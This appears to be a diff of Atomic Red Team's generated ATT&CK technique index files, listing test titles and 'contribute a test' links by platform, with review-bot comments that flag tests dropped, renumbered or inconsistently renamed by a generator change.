- Atomic Test #11: Modify VSS Service Permissions [windows]
- Atomic Test #12: Disable Time Machine [macos]
- Atomic Test #13: Windows - Delete Volume Shadow Copies via Diskshadow [windows]
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
@@ -3152,9 +3105,7 @@
- [T1195 Supply Chain Compromise](../../T1195/T1195.md)
- Atomic Test #1: Octopus Scanner Malware Open Source Supply Chain [windows]
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #1: MITM Proxy Injection [macos, linux]
- Atomic Test #2: MITM Proxy Injection (Windows) [windows]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
+13 -25
@@ -13,7 +13,6 @@
- [T1027.013 Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md)
- Atomic Test #1: Decode Eicar File and Write to File [windows, macos, linux]
- Atomic Test #2: Decrypt Eicar File and Write to File [windows, macos, linux]
- Atomic Test #3: Password-Protected ZIP Payload Extraction and Execution [linux, macos]
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
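Review bot: T1027.013 test #3 (Password-Protected ZIP Payload Extraction and Execution, linux/macos) is dropped from this platform index, and the same line is dropped in the third file of this comparison, so the loss is not a per-platform filter issue but a source-level one; check that the test still exists and that the generator's platform handling accounts for multi-platform entries.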
@@ -224,7 +223,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -327,9 +326,7 @@
- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
- Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -414,8 +411,9 @@
- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Firefox [linux, windows, macos]
- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
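Review bot: the CONTRIBUTE A TEST label for T1137.005 drops the parent technique name ("Office Application Startup: Outlook Rules" becomes "Outlook Rules") while the unchanged neighbouring lines "T1505.005 Server Software Component: Terminal Services DLL" and "T1546.011 Event Triggered Execution: Application Shimming" keep it. Pick one convention for sub-technique names in the generator so the index stays consistent within a single file.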
@@ -466,15 +464,13 @@
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
- Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -502,16 +498,14 @@
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- Atomic Test #2: Base64 Encoded data (freebsd) [linux]
- [T1568.002 Dynamic Resolution: Domain Generation Algorithms](../../T1568.002/T1568.002.md)
- Atomic Test #1: DGA Simulation (Python) [linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #1: MITM Proxy Injection [macos, linux]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #5: Microsoft Dev tunnels (Linux/macOS) [linux, macos]
@@ -722,7 +716,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -738,9 +732,7 @@
- Atomic Test #2: Check internet connection using ping freebsd, linux or macos [macos, linux]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1652 Device Driver Discovery](../../T1652/T1652.md)
- Atomic Test #2: Device Driver Discovery (Linux) [linux]
- Atomic Test #3: Enumerate Kernel Driver Files (Linux) [linux]
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #23: Active Directory Domain Search [linux]
- Atomic Test #24: Account Enumeration with LDAPDomainDump [linux]
@@ -758,7 +750,6 @@
- Atomic Test #15: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS [linux]
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #3: System Service Discovery - systemctl/service [linux]
- Atomic Test #8: System Service Discovery - Linux init scripts [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
@@ -800,9 +791,7 @@
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
- Atomic Test #8: Identifying Network Shares - Linux [linux]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #4: System Network Connections Discovery via ss or lsof (Linux/MacOS) [linux, macos]
- Atomic Test #5: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- Atomic Test #6: System Network Connections Discovery via sockstat (Linux, FreeBSD) [linux]
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
@@ -907,8 +896,7 @@
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #1: MITM Proxy Injection [macos, linux]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+15 -25
@@ -13,7 +13,6 @@
- [T1027.013 Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md)
- Atomic Test #1: Decode Eicar File and Write to File [windows, macos, linux]
- Atomic Test #2: Decrypt Eicar File and Write to File [windows, macos, linux]
- Atomic Test #3: Password-Protected ZIP Payload Extraction and Execution [linux, macos]
- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -180,7 +179,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -285,9 +284,7 @@
- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
- Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -364,9 +361,10 @@
- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Firefox [linux, windows, macos]
- Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -413,15 +411,13 @@
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
- Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -446,15 +442,14 @@
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #1: MITM Proxy Injection [macos, linux]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #5: Microsoft Dev tunnels (Linux/macOS) [linux, macos]
@@ -644,7 +639,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -660,9 +655,7 @@
- Atomic Test #2: Check internet connection using ping freebsd, linux or macos [macos, linux]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1652 Device Driver Discovery](../../T1652/T1652.md)
- Atomic Test #4: List loaded kernel extensions (macOS) [macos]
- Atomic Test #5: Find Kernel Extensions (macOS) [macos]
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #2: View sudoers access [linux, macos]
@@ -676,8 +669,7 @@
- Atomic Test #7: Check if System Integrity Protection is enabled [macos]
- Atomic Test #8: Detect Virtualization Environment using system_profiler [macos]
- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #5: System Service Discovery - macOS launchctl [macos]
- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos]
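Review bot: T1007 System Service Discovery drops `Atomic Test #5: System Service Discovery - macOS launchctl` and flips to `CONTRIBUTE A TEST`, while T1040 directly below keeps its `[macos]` tests #3 and #8. Both entries are non-contiguous macOS-only views of a larger test list, so the loss is specific to how the port handles this technique's test file; worth reproducing on that single technique before looking at the rest of the diff.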
@@ -712,8 +704,7 @@
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #4: System Network Connections Discovery via ss or lsof (Linux/MacOS) [linux, macos]
- Atomic Test #5: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
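Review bot: in the T1049 block, test #4 (`via ss or lsof`) disappears and the surviving `FreeBSD, Linux & MacOS` test is renumbered from #5 to #3. Atomic test numbers are stable identifiers that detection mappings, run commands and external write-ups refer to, so renumbering an existing test when a sibling vanishes silently breaks those references. If the `ss or lsof` test was removed on purpose, the surviving test should keep #5; if not, the port is both dropping a test and compacting the sequence, and the numbering should come from the test's position in the technique's full test list as before.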
@@ -795,8 +786,7 @@
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #1: MITM Proxy Injection [macos, linux]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
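Review bot: `T1659 Content Injection` goes from a linked page with `Atomic Test #1: MITM Proxy Injection [macos, linux]` to `CONTRIBUTE A TEST`. The Windows view of the same technique (`Atomic Test #2: MITM Proxy Injection (Windows)`) flips the same way later in this diff, which points at the generator no longer discovering this technique's tests at all rather than at a platform filter; please confirm the test YAML still exists and fix the lookup.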
@@ -83,7 +83,7 @@
- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
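Review bot: `T1137.005 Office Application Startup: Outlook Rules` becomes `T1137.005 Outlook Rules` while the adjacent `T1137.006 Office Application Startup: Add-ins` and `T1137.001 Office Application Startup: Office Template Macros.` keep their prefix, so sub-technique naming is now inconsistent within a single list. Pick one convention for the port and apply it to all sub-techniques; the trailing period on the T1137.001 name is a pre-existing nit that the same pass could normalise.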
@@ -505,7 +505,6 @@
- Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
- Atomic Test #9: Snake Malware Encrypted crmlog file [windows]
- Atomic Test #10: Execution from Compressed JScript File [windows]
- Atomic Test #11: Obfuscated PowerShell Command via Character Array [windows]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
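Review bot: `Atomic Test #11: Obfuscated PowerShell Command via Character Array` is removed with nothing replacing it (the hunk shrinks from 7 to 6 lines). A conversion commit should not change which tests are indexed; if that test is still present in the atomics directory, the new parser is skipping it and the index will under-report obfuscation coverage. A generator that silently drops entries is a correctness problem in itself, so consider having the port warn or fail when a technique directory contains a test it could not parse.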
@@ -563,8 +562,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
